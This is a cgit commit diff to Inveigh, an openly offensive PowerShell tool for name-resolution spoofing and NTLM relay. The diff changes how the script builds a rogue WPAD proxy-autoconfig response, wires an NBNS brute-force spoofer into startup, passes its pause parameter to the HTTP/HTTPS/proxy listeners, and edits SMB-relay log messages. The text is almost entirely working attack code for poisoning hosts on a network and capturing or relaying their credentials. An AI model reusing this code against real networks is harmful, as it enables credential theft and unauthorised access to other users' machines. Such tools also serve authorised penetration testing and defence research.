aboutsummaryrefslogtreecommitdiff
path: root/Scripts
diff options
context:
space:
mode:
Diffstat (limited to 'Scripts')
-rw-r--r--Scripts/Inveigh-Relay.ps118
-rw-r--r--Scripts/Inveigh.ps137
2 files changed, 33 insertions, 22 deletions
diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1
index e2ed0bb..983ac0c 100644
--- a/Scripts/Inveigh-Relay.ps1
+++ b/Scripts/Inveigh-Relay.ps1
@@ -90,7 +90,7 @@ target.
Default = Enable: (Y/N) Enable/Disable automaticaly exiting after a relay is disabled due to success or error.
.PARAMETER ConsoleOutput
-Default = Disabled: (N,Y,Medium,Low) Enable/Disable real time console output. If using this option through a shell, test to
+Default = Disabled: (Low,Medium,Y,N) Enable/Disable real time console output. If using this option through a shell, test to
ensure that it doesn't hang the shell. Medium and Low can be used to reduce output.
.PARAMETER ConsoleStatus
@@ -164,7 +164,7 @@ param
[parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0",
[parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0",
- [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "",
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "0.0.0.0",
[parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
[parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox",
[parameter(Mandatory=$false)][Array]$Usernames = "",
@@ -188,9 +188,9 @@ if ($invalid_parameter)
throw
}
-if(!$ProxyIP)
+if($ProxyIP -eq '0.0.0.0')
{
- $ProxyIP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
+ $proxy_WPAD_IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
}
if(!$OutputDir)
@@ -492,7 +492,7 @@ if($Proxy -eq 'Y')
{
$inveigh.status_queue.Add("Proxy Capture/Relay = Enabled") > $null
$ProxyPortFailover = $ProxyPort + 1
- $WPADResponse = "function FindProxyForURL(url,host){return `"PROXY $ProxyIP`:$ProxyPort; PROXY $ProxyIP`:$ProxyPortFailover; DIRECT`";}"
+ $WPADResponse = "function FindProxyForURL(url,host){return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $proxy_WPAD_IP`:$ProxyPortFailover; DIRECT`";}"
$ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()})
if($ProxyIgnore.Count -gt 0)
@@ -1813,8 +1813,8 @@ $SMB_relay_response_scriptblock =
}
elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '05-00-00-00')
{
- $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $Target")])
+ $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")])
$SMB_relay_failed = $true
}
else
@@ -2249,8 +2249,8 @@ $SMB_relay_response_scriptblock =
}
elseif([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '05-00-00-00')
{
- $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $Target")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $Target")])
+ $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")])
$SMB_relay_failed = $true
}
else
diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1
index 0442f54..51b7d84 100644
--- a/Scripts/Inveigh.ps1
+++ b/Scripts/Inveigh.ps1
@@ -103,7 +103,7 @@ wpad.dat requests. NTLMNoESS turns off the 'Extended Session Security' flag duri
Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.
.PARAMETER HTTPContentType
-Default = none: Content type for HTTP/HTTPS responses. Does not apply to EXEs and wpad.dat. Set to "application/hta"
+Default = text/html: Content type for HTTP/HTTPS responses. Does not apply to EXEs and wpad.dat. Set to "application/hta"
for HTA files or when using HTA code with HTTPResponse.
.PARAMETER HTTPDir
@@ -195,7 +195,7 @@ challenge will be generated for each request.
Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
.PARAMETER ConsoleOutput
-Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to
+Default = Disabled: (Low,Medium,Y,N) Enable/Disable real time console output. If using this option through a shell, test to
ensure that it doesn't hang the shell. Medium and Low can be used to reduce output.
.PARAMETER ConsoleStatus
@@ -535,6 +535,7 @@ if(!$elevated_privilege)
}
+$inveigh.hostname_spoof = $false
$inveigh.running = $true
if($StatusOutput -eq 'Y')
@@ -945,6 +946,10 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
{
$proxy_WPAD_IP = $IP
}
+ else
+ {
+ $proxy_WPAD_IP = $ProxyIP
+ }
if($WPADIP -and $WPADPort)
{
@@ -1330,7 +1335,7 @@ $SMB_NTLM_functions_scriptblock =
# HTTP Server ScriptBlock - HTTP/HTTPS/Proxy listener
$HTTP_scriptblock =
{
- param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPContentType,$HTTPIP,$HTTPPort,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse,$HTTPS_listener,$ProxyIgnore,$proxy_listener,$WPADAuth,$WPADResponse)
+ param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPContentType,$HTTPIP,$HTTPPort,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse,$HTTPS_listener,$NBNSBruteForcePause,$ProxyIgnore,$proxy_listener,$WPADAuth,$WPADResponse)
function NTLMChallengeBase64
{
@@ -1576,8 +1581,8 @@ $HTTP_scriptblock =
if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | ForEach-Object{$HTTP_header_user_agent.contains($_)}))
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request from $HTTP_source_IP")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request from $HTTP_source_IP")])
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")])
}
}
@@ -3088,8 +3093,8 @@ function HTTPListener()
$HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument(
$HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPPort).AddArgument(
$HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument(
- $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument(
- $proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
+ $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument(
+ $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
$HTTP_powershell.BeginInvoke() > $null
}
@@ -3109,8 +3114,8 @@ function HTTPSListener()
$HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument(
$HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPSPort).AddArgument(
$HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument(
- $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument(
- $proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
+ $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument(
+ $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
$HTTPS_powershell.BeginInvoke() > $null
}
@@ -3130,8 +3135,8 @@ function ProxyListener()
$proxy_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument(
$HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($ProxyIP).AddArgument($ProxyPort).AddArgument(
$HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument(
- $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument(
- $proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
+ $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument(
+ $ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
$proxy_powershell.BeginInvoke() > $null
}
@@ -3262,6 +3267,12 @@ elseif(($LLMNR -eq 'Y' -or $NBNS -eq 'Y' -or $SMB -eq 'Y') -and !$elevated_privi
}
+# NBNSBruteForce Spoofer Start
+if($NBNSBruteForce -eq 'Y')
+{
+ NBNSBruteForceSpoofer
+}
+
# Control Loop Start
if($RunCount -or $RunTime -or $inveigh.file_output -or $NBNSBruteForcePause)
{
@@ -3292,7 +3303,7 @@ if($inveigh.console_output)
$inveigh.console_queue.RemoveAt(0)
}
- {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent *"}
+ {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"}
{
if($ConsoleOutput -eq 'Y')
@@ -3769,7 +3780,7 @@ if($inveigh.tool -ne 1)
$inveigh.console_queue.RemoveAt(0)
}
- {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent *"}
+ {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"}
{
if($ConsoleOutput -eq 'Y')
generated by cgit v1.2.3 (git 2.39.1) at 2025-07-12 13:02:40 +0000